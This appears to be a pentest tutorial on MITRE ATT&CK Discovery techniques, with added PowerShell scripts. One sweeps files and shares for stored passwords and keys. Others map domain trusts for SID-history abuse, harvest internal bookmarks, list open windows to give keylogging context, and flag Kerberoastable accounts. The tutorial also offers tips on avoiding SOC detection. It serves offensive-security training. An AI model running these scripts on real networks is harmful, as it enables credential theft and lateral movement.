
Pentest Red Team Techniques - Discovery

File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. Custom tools may also be used to gather file and directory information and interact with the Native API.

Example

Simply by using the dir command we can enumerate directories. dir /s walks the subdirectories as well, and dir /s /b gives a bare list of full paths that is easy to pipe into findstr when looking for particular file names.

[Screenshot: output of the dir command]
 
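An added example, not from the original post, of the same technique done at scale in PowerShell: instead of walking the tree by hand with dir, it sweeps a few roots for file types and names that tend to hold credentials or configuration and greps the text-like ones for a handful of keywords. The roots (including the \\FILESERVER01\share path), extensions and keyword list are illustrative assumptions; adjust them to the target.

```powershell
# Added example, not from the original post. Roots, extensions and keywords
# below are illustrative assumptions; \\FILESERVER01\share is a placeholder.
$Roots    = @("$env:USERPROFILE", 'C:\inetpub', '\\FILESERVER01\share')
$Patterns = @('*.kdbx', '*.config', '*.ini', '*.rdp', '*.pem', '*.ppk',
              '*.ps1', '*.bat', '*.txt', '*.xml', '*.json')
$Keywords = @('password', 'passwd', 'pwd=', 'secret', 'token', 'apikey',
              'connectionstring')
# Extensions we only report by name and never open (binary or encrypted).
$NoRead   = @('.kdbx', '.pem', '.ppk')

$hits = foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # offline share, missing dir
    # -Include only filters when -Recurse is set. Errors (access denied, long
    # paths) are suppressed so one bad folder does not stop the sweep.
    Get-ChildItem -LiteralPath $root -Recurse -File -Include $Patterns -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt 5MB } |            # skip logs and dumps, keep it fast
        ForEach-Object {
            $f = $_
            # Name-based hit: the file name itself mentions something interesting.
            $nameHit = $Keywords | Where-Object { $f.BaseName -like "*$_*" } | Select-Object -First 1
            # Content-based hit: first matching line of a text-like file.
            $contentHit = $null
            if ($f.Extension -notin $NoRead) {
                $contentHit = Select-String -LiteralPath $f.FullName -Pattern $Keywords `
                                  -SimpleMatch -List -ErrorAction SilentlyContinue
            }
            if ($nameHit -or $contentHit) {
                [pscustomobject]@{
                    Path     = $f.FullName
                    SizeKB   = [math]::Round($f.Length / 1KB, 1)
                    Modified = $f.LastWriteTime
                    Reason   = if ($nameHit) { "name:$nameHit" } else { "content:$($contentHit.Pattern)" }
                }
            }
        }
}

# Newest first: recently touched config files are the most likely to still be valid.
$hits | Sort-Object Modified -Descending | Format-Table -AutoSize
```

The cmd-only equivalent is dir /s /b for the listing and findstr /s /i for the content search; they need no PowerShell but are slower and give no size or timestamp filtering. Either way the sweep is noisy on a monitored host: thousands of file opens in a few seconds from one process stand out in file-access auditing.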

Domain Trust Discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting; whether a given trust is transitive and whether SID filtering is enforced on it decides which of those are actually possible across it. Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP. The Windows utility nltest is known to be used by adversaries to enumerate domain trusts.

Example

Using nltest /domain_trusts we can list the domains trusted by the current domain; /all_trusts widens it to every trust the domain controller knows about, including indirect ones, and /v adds the domain SIDs and GUIDs.

[Screenshot: output of nltest /domain_trusts]
 
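An added example, not the post's own code, that enumerates trusts each of the three ways the text names: nltest for the quick view, the .NET Domain and Forest classes, and an LDAP query for the trustedDomain objects, whose trustAttributes bits say whether the trust is transitive and how SID filtering is configured on it. It needs a domain-joined session that can reach a domain controller; the bit values are from the trustAttributes definition, and nothing else here is a real environment.

```powershell
# Added example, not from the original post. Runs against the domain the
# current session belongs to; no domain names or values here are real.

# 1. nltest: the same view as the screenshot. /domain_trusts lists trusts of
#    the current domain; /all_trusts adds indirect ones known to the DC.
nltest /domain_trusts /all_trusts

# 2. .NET: trusts of the current domain and of the whole forest.
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
@($domain.GetAllTrustRelationships()) + @($forest.GetAllTrustRelationships()) |
    Select-Object SourceName, TargetName, TrustType, TrustDirection |
    Format-Table -AutoSize

# 3. LDAP: each trust is a trustedDomain object under CN=System. The
#    trustAttributes bits are what matter for follow-on attacks:
#      0x1  NON_TRANSITIVE       0x8  FOREST_TRANSITIVE   0x20 WITHIN_FOREST
#      0x4  QUARANTINED_DOMAIN   (SID filtering on an external trust)
#      0x40 TREAT_AS_EXTERNAL    (forest trust relaxed so SID history passes)
#      0x80 TRUST_USES_RC4_ENCRYPTION
$rootDse  = [ADSI]'LDAP://RootDSE'
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]"LDAP://$($rootDse.defaultNamingContext)"
$searcher.Filter     = '(objectClass=trustedDomain)'
[void]$searcher.PropertiesToLoad.AddRange([string[]]@(
    'trustPartner', 'flatName', 'trustDirection', 'trustType', 'trustAttributes'))

# trustDirection / trustType are from the local domain's point of view.
$Direction = @{ 0 = 'Disabled'; 1 = 'Inbound'; 2 = 'Outbound'; 3 = 'Bidirectional' }
$Type      = @{ 1 = 'Downlevel(NT4)'; 2 = 'Uplevel(AD)'; 3 = 'MIT Kerberos'; 4 = 'DCE' }

$trusts = foreach ($r in $searcher.FindAll()) {
    $p     = $r.Properties
    $attrs = [int]$p['trustattributes'][0]
    [pscustomobject]@{
        Partner           = [string]$p['trustpartner'][0]
        NetBIOS           = [string]$p['flatname'][0]
        Direction         = $Direction[[int]$p['trustdirection'][0]]
        Type              = $Type[[int]$p['trusttype'][0]]
        Transitive        = -not ($attrs -band 0x1)
        ForestTransitive  = [bool]($attrs -band 0x8)
        WithinForest      = [bool]($attrs -band 0x20)
        Quarantined       = [bool]($attrs -band 0x4)     # SID filtering enforced (external)
        SidHistoryAllowed = [bool]($attrs -band 0x40)    # forest trust treated as external
        UsesRC4           = [bool]($attrs -band 0x80)
    }
}
$trusts | Format-Table -AutoSize
```

Read the last two flags together: external trusts are quarantined (0x4) by default, and forest trusts filter SIDs by default without any flag, so a forest trust with TREAT_AS_EXTERNAL set, or an external trust without QUARANTINED_DOMAIN, is the case where SID-History Injection across the trust has a chance of working.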

Browser Bookmark Discovery

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browser bookmarks may also highlight additional targets once an adversary has access to valid credentials, especially when combined with Credentials in Files such as logins cached by the browser.

Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.

Example

Where to look varies by browser, since each keeps its own profile folder. Firefox, for example, stores its profiles under %APPDATA%\Mozilla\Firefox\Profiles\, with the bookmarks held in the places.sqlite database of each profile (the file is locked while Firefox runs, so copy it before querying it). Chromium-based browsers such as Chrome and Edge keep a JSON file simply named Bookmarks under their User Data\Default folder in %LOCALAPPDATA%.

[Screenshot: Firefox profile directory listing]
 
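An added example, not from the original post, that reads the bookmark stores described above: the JSON Bookmarks file of Chromium-based browsers (Chrome and Edge under %LOCALAPPDATA%) is parsed and walked recursively, each entry is tagged with its folder path, and entries that point at hosts that look internal (RFC 1918 addresses, dotless hostnames, .local/.corp/.internal suffixes, file:// shares) are listed first. For Firefox it only locates each profile's places.sqlite, since reading it needs a copy of the file and a SQLite client. The paths are the default profile locations and the internal-host heuristic is an assumption.

```powershell
# Added example, not from the original post. Paths are the default profile
# locations; the "looks internal" heuristic is an assumption.

function Get-ChromiumBookmarks {
    param([string]$Path, [string]$Browser)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $json = Get-Content -LiteralPath $Path -Raw | ConvertFrom-Json
    # The file is a tree: "url" leaves and "folder" nodes with a children array.
    function Walk($node, $trail) {
        if ($node.type -eq 'url') {
            [pscustomobject]@{ Browser = $Browser; Folder = $trail; Name = $node.name; Url = $node.url }
        } elseif ($node.children) {
            foreach ($child in $node.children) { Walk $child "$trail/$($node.name)" }
        }
    }
    # Three fixed roots: the bookmarks bar, "Other bookmarks" and synced/mobile.
    foreach ($rootName in 'bookmark_bar', 'other', 'synced') {
        $rootNode = $json.roots.$rootName
        if ($rootNode) { Walk $rootNode '' }
    }
}

function Test-InternalUrl {
    param([string]$Url)
    $u = $null
    if (-not [uri]::TryCreate($Url, [UriKind]::Absolute, [ref]$u)) { return $false }
    if ($u.Scheme -notin @('http', 'https', 'ftp', 'file')) { return $false }
    if ($u.Scheme -eq 'file') { return $true }            # UNC paths and local shares
    $h = $u.Host
    # RFC 1918 address, bare hostname, or a non-public suffix.
    $rfc1918 = $h -match '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)'
    $bare    = $h -notmatch '\.'
    $suffix  = $h -match '\.(local|corp|internal|lan|intranet)$'
    return ($rfc1918 -or $bare -or $suffix)
}

$stores = @(
    @{ Browser = 'Chrome'; Path = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Bookmarks" }
    @{ Browser = 'Edge';   Path = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Bookmarks" }
)
$all = foreach ($s in $stores) { Get-ChromiumBookmarks -Path $s.Path -Browser $s.Browser }

Write-Host "$(@($all).Count) bookmarks found; internal-looking targets:"
$all | Where-Object { Test-InternalUrl $_.Url } |
    Format-Table Browser, Folder, Name, Url -AutoSize

# Firefox: one places.sqlite per profile. It is locked while Firefox runs, so
# copy it out and query moz_bookmarks joined to moz_places with a SQLite client:
#   SELECT b.title, p.url FROM moz_bookmarks b JOIN moz_places p ON b.fk = p.id;
Get-ChildItem "$env:APPDATA\Mozilla\Firefox\Profiles" -Filter places.sqlite -Recurse -ErrorAction SilentlyContinue |
    Select-Object FullName, Length, LastWriteTime
```

Only the Default profile is read here; a user with several Chromium profiles has one Bookmarks file per Profile N folder next to Default, so enumerate the User Data directory when the default comes back empty.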

Application Window Discovery

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.

Example

tasklist lists running processes rather than windows, but tasklist /v adds a Window Title column with the title of each process's main window (N/A for background processes). From that we can see how the workstation is actually used, for example which internal applications, documents or admin consoles are open, and judge whether it is a worthwhile target for Exploitation or other techniques.

[Screenshot: output of tasklist]

Keyloggers can be used as well to capture what the user is working on, and window titles give the captured keystrokes their context, showing which application or document they were typed into.
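An added example, not from the original post, of application window discovery done two ways: tasklist /v parsed into objects, which gives the owning user but only one Window Title per process, and an EnumWindows call into user32 through Add-Type, which lists every visible top-level window, including the extra documents, dialogs and tool windows a process owns that tasklist and Get-Process's MainWindowTitle do not report. The two views are joined on PID.

```powershell
# Added example, not from the original post.

# 1. tasklist /v as the post shows, but as objects. The Window Title column is
#    the main window of each process, "N/A" when it has none or when the
#    process belongs to another session.
$byPid = @{}
tasklist /v /fo csv | ConvertFrom-Csv | ForEach-Object { $byPid[[int]$_.PID] = $_ }

# 2. Native API: walk every visible top-level window. A process can own several
#    (documents, dialogs, tool windows); tasklist shows only the first.
Add-Type -TypeDefinition @'
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class User32Enum {
    public delegate bool EnumWindowsProc(IntPtr hWnd, IntPtr lParam);
    [DllImport("user32.dll")] public static extern bool EnumWindows(EnumWindowsProc cb, IntPtr lParam);
    [DllImport("user32.dll")] public static extern bool IsWindowVisible(IntPtr hWnd);
    [DllImport("user32.dll", CharSet = CharSet.Unicode)] public static extern int GetWindowTextLength(IntPtr hWnd);
    [DllImport("user32.dll", CharSet = CharSet.Unicode)] public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int max);
    [DllImport("user32.dll")] public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint pid);
}
'@

$windows  = New-Object System.Collections.Generic.List[object]
$callback = [User32Enum+EnumWindowsProc]{
    param([IntPtr]$hWnd, [IntPtr]$lParam)
    if ([User32Enum]::IsWindowVisible($hWnd)) {
        $len = [User32Enum]::GetWindowTextLength($hWnd)
        if ($len -gt 0) {                                   # untitled windows are noise
            $sb = New-Object System.Text.StringBuilder ($len + 1)
            [void][User32Enum]::GetWindowText($hWnd, $sb, $sb.Capacity)
            $owner = [uint32]0
            [void][User32Enum]::GetWindowThreadProcessId($hWnd, [ref]$owner)
            $t = $byPid[[int]$owner]                        # join to the tasklist row
            $windows.Add([pscustomobject]@{
                PID     = [int]$owner
                Process = if ($t) { $t.'Image Name' } else { '?' }
                User    = if ($t) { $t.'User Name' }  else { '?' }
                Title   = $sb.ToString()
            })
        }
    }
    return $true                                            # keep enumerating
}
[void][User32Enum]::EnumWindows($callback, [IntPtr]::Zero)

$windows | Sort-Object Process, Title | Format-Table -AutoSize
```

EnumWindows only sees windows on the caller's desktop, so a payload running as a service, or in session 0, gets nothing useful from it; the tasklist half still works there because it reads process information, not the window station.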
 

Account Discovery

Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid follow-on behavior.
 

Domain Account

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.

Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups.

Example

We can utilize the net user /domain command to view users on the domain. The host must be domain-joined and the session must be able to authenticate to a domain controller; from a standalone host, or from a purely local account, the command fails with a system error instead of a list.

[Screenshot: output of net user /domain]
 

Local Account

Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.

Commands such as net user and net localgroup of the Net utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated using the /etc/passwd file.

Example

By utilizing the net user command on CMD we can view the local accounts, and net localgroup Administrators shows which of them are local admins.

[Screenshot: output of net user]
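An added example, not from the original post, covering both the Domain Account and Local Account passages in one script. The domain half asks a domain controller over LDAP for what net user /domain lists, plus the attributes that make an account interesting for follow-on work (disabled, password never expires, Kerberos pre-authentication off, an SPN set, adminCount, group membership). The local half uses Get-LocalUser and Get-LocalGroupMember where they exist and falls back to the WinNT ADSI provider on older hosts. The domain part needs a domain-joined session; the userAccountControl bit values are the documented ones and no names here are real.

```powershell
# Added example, not from the original post.

# userAccountControl bits (documented values, shared by WinNT UserFlags).
$ACCOUNTDISABLE     = 0x2
$DONT_EXPIRE_PASSWD = 0x10000
$DONT_REQ_PREAUTH   = 0x400000     # AS-REP roastable

# --- Domain accounts over LDAP (what net user /domain asks the DC for) ---
function Get-DomainUserSummary {
    $rootDse  = [ADSI]'LDAP://RootDSE'
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$($rootDse.defaultNamingContext)"
    $searcher.Filter     = '(&(objectCategory=person)(objectClass=user))'
    $searcher.PageSize   = 1000    # without paging a DC caps the answer at 1000 entries
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@(
        'samaccountname', 'useraccountcontrol', 'admincount',
        'serviceprincipalname', 'lastlogontimestamp', 'memberof'))
    foreach ($r in $searcher.FindAll()) {
        $p   = $r.Properties          # missing attributes come back as empty collections
        $uac = [int]$p['useraccountcontrol'][0]
        $last = $null
        if ($p['lastlogontimestamp'].Count) {
            $last = [datetime]::FromFileTime([int64]$p['lastlogontimestamp'][0])
        }
        [pscustomobject]@{
            Name        = [string]$p['samaccountname'][0]
            Enabled     = -not ($uac -band $ACCOUNTDISABLE)
            PwdNeverExp = [bool]($uac -band $DONT_EXPIRE_PASSWD)
            NoPreauth   = [bool]($uac -band $DONT_REQ_PREAUTH)
            HasSPN      = $p['serviceprincipalname'].Count -gt 0      # Kerberoastable
            AdminCount  = if ($p['admincount'].Count) { [int]$p['admincount'][0] } else { 0 }
            LastLogon   = $last
            Groups      = ($p['memberof'] | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ';'
        }
    }
}

# --- Local accounts (what net user and net localgroup list) ---
function Get-LocalUserSummary {
    if (Get-Command Get-LocalUser -ErrorAction SilentlyContinue) {
        $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
                  ForEach-Object { ($_.Name -split '\\')[-1] }
        Get-LocalUser | ForEach-Object {
            [pscustomobject]@{
                Name        = $_.Name
                Enabled     = $_.Enabled
                PwdNeverExp = -not $_.PasswordExpires
                LastLogon   = $_.LastLogon
                IsAdmin     = $_.Name -in $admins
            }
        }
    } else {
        # Older hosts without the LocalAccounts module: same data via WinNT.
        $computer = [ADSI]"WinNT://$env:COMPUTERNAME"
        $admins   = ([ADSI]"WinNT://$env:COMPUTERNAME/Administrators,group").Invoke('Members') |
                    ForEach-Object { $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null) }
        $computer.Children | Where-Object { $_.SchemaClassName -eq 'User' } | ForEach-Object {
            $flags = [int]$_.UserFlags.Value
            $last  = $null
            try { $last = $_.LastLogin.Value } catch { }   # throws when the user never logged in
            [pscustomobject]@{
                Name        = $_.Name.Value
                Enabled     = -not ($flags -band $ACCOUNTDISABLE)
                PwdNeverExp = [bool]($flags -band $DONT_EXPIRE_PASSWD)
                LastLogon   = $last
                IsAdmin     = $_.Name.Value -in $admins
            }
        }
    }
}

Get-LocalUserSummary  | Format-Table -AutoSize
Get-DomainUserSummary | Where-Object Enabled |
    Sort-Object AdminCount, HasSPN -Descending | Format-Table -AutoSize
```

The domain query reads from whichever DC the session is bound to, which is also where it gets logged: one LDAP search returning every user object is a familiar signature for defenders, so on an engagement with a mature SOC narrow the filter (for example to accounts with an SPN, or members of one group) rather than pulling the whole directory.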
 